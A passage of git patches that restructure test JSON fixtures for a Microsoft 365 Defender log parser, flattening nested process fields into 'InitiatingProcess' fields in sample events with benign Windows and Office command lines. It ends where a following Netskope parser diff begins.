{ "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", - "FileSize": 56824728, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", - "VersionInfoInternalFileName": "OneDriveSetup.exe", - "VersionInfoOriginalFileName": "OneDriveSetup.exe", - "VersionInfoProductName": "Microsoft OneDrive", - "VersionInfoProductVersion": "22.166.0807.0002" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "OneDriveSetup.exe /update /restart /updateSource:ODU /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions /enableODSUReportingMode ", + "InitiatingProcessFileSize": 56824728, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft OneDrive (64 bit) Setup", + "InitiatingProcessVersionInfoInternalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoOriginalFileName": "OneDriveSetup.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft OneDrive", + "InitiatingProcessVersionInfoProductVersion": "22.166.0807.0002" }, "type": "FileDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json index 1a9daafcd..73d8718f8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json @@ -22,19 +22,17 @@ "@timestamp": "2024-11-08T14:38:51.904876Z", "action": { "properties": { - "RequestAccountSid": "S-1-2-3", - "process": { - "CommandLine": "commandexec.exe /V", - "FileSize": 176128, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "commandexec", - "VersionInfoOriginalFileName": "commandexec.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" }, "type": "FileCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json index 04559806a..497faa7bf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_image_load_event.json @@ -16,12 +16,10 @@ "@timestamp": "2022-09-01T07:47:58.616127Z", "action": { "properties": { - "process": { - "CommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", - "FileSize": 66560, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault" - } + "InitiatingProcessCommandLine": "\"autosync.exe\" /c C:\\PROGRA~2\\adobe\\8.1\\Client\\bin\\fra\\adobe.cfg /c \" usa\"", + "InitiatingProcessFileSize": 66560, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault" }, "type": "ImageLoaded" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json index e70edf395..15dc7a41b 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_events.json @@ -17,11 +17,9 @@ "action": { "properties": { "AccountSid": "S-1-1-11-1-1", + "InitiatingProcessCommandLine": "WinLogon.exe -SpecialSession", "LogonId": "111111", - "LogonType": "Interactive", - "process": { - "CommandLine": "WinLogon.exe -SpecialSession" - } + "LogonType": "Interactive" }, "type": "LogonSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json index 75ab306b8..348f76f4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_events.json @@ -16,21 +16,19 @@ "@timestamp": "2023-01-04T14:05:32.314862Z", "action": { "properties": { + "InitiatingProcessAccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", + "InitiatingProcessCommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", + "InitiatingProcessFileSize": 63984520, + "InitiatingProcessIntegrityLevel": "Medium", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Excel", + "InitiatingProcessVersionInfoInternalFileName": "Excel", + "InitiatingProcessVersionInfoOriginalFileName": "Excel.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.15601.20538", "LocalIPType": "Private", - "RemoteIPType": "Public", - "process": { - "AccountObjectId": "e0e5e759-c1e1-4cf9-91d5-c1099ef74614", - "CommandLine": "\"EXCEL.EXE\" \"C:\\Users\\USER\\MyDocument.xslx", - "FileSize": 63984520, - "IntegrityLevel": "Medium", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Excel", - "VersionInfoInternalFileName": "Excel", - "VersionInfoOriginalFileName": "Excel.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.15601.20538" - } + "RemoteIPType": "Public" }, "type": "ConnectionSuccess" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 3847a138b..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -17,30 +17,26 @@ "action": { "properties": { "AccountSid": "S-1-1-11", + "InitiatingProcessCommandLine": "\"MsMpEng.exe\"", + "InitiatingProcessFileSize": 133576, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Antimalware Service Executable", + "InitiatingProcessVersionInfoInternalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoOriginalFileName": "MsMpEng.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", - "VersionInfoInternalFileName": "MpCmdRun", - "VersionInfoOriginalFileName": "MpCmdRun.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6", - "parent": { - "CommandLine": "\"MsMpEng.exe\"", - "FileSize": 133576, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Antimalware Service Executable", - "VersionInfoInternalFileName": "MsMpEng.exe", - "VersionInfoOriginalFileName": "MsMpEng.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "4.18.2301.6" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", + "ProcessVersionInfoInternalFileName": "MpCmdRun", + "ProcessVersionInfoOriginalFileName": "MpCmdRun.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "4.18.2301.6" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index cac1e9791..cab75fb0a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -23,30 +23,26 @@ "action": { "properties": { "AccountSid": "S-1-2-3", + "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "InitiatingProcessFileSize": 145408, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessLogonId": "999", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "file", + "InitiatingProcessVersionInfoOriginalFileName": "file.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", "LogonId": "999", - "process": { - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Network Command Shell", - "VersionInfoInternalFileName": "processcommand.exe", - "VersionInfoOriginalFileName": "processcommand.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.1", - "parent": { - "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "FileSize": 145408, - "IntegrityLevel": "System", - "LogonId": "999", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows\u00ae installer", - "VersionInfoInternalFileName": "file", - "VersionInfoOriginalFileName": "file.exe", - "VersionInfoProductName": "Windows Installer - Unicode", - "VersionInfoProductVersion": "5.0.22621.3880" - } - } + "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", + "ProcessVersionInfoCompanyName": "Microsoft Corporation", + "ProcessVersionInfoFileDescription": "Network Command Shell", + "ProcessVersionInfoInternalFileName": "processcommand.exe", + "ProcessVersionInfoOriginalFileName": "processcommand.exe", + "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "ProcessVersionInfoProductVersion": "10.0.22621.1" }, "type": "ProcessCreated" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 212f23549..3fe0d2cf8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json @@ -16,19 +16,17 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", - "process": { - "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "FileSize": 445440, - "IntegrityLevel": "System", - "TokenElevation": "TokenElevationTypeDefault", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Host Process for OMA-DM Client", - "VersionInfoInternalFileName": "omadmclient", - "VersionInfoOriginalFileName": "omadmclient.exe", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.19041.2193" - } + "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "InitiatingProcessFileSize": 445440, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", + "InitiatingProcessVersionInfoInternalFileName": "omadmclient", + "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index c632ebbfa..a04e0e8be 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 5f3e9f9b1..294c92d60 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json @@ -17,18 +17,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 57b4e7abc..031a0b50a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index e45140956..7d110bb54 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index f1753e2d7..0a0174b85 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 3e55ad2b0..6077ecfdc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index 55684497d..f33a1eb87 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 5a6e54961..3cedbfdb3 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 9304ca1cb..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,14 +22,10 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "LogonId": "0", - "process": { - "parent": { - "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "FileSize": 11864, - "LogonId": "0" - } - } + "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "InitiatingProcessFileSize": 11864, + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 09:40:42 +0100 Subject: [PATCH 098/150] Update Netskope/netskope_events/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Netskope/netskope_events/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 7ce3a2543..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ 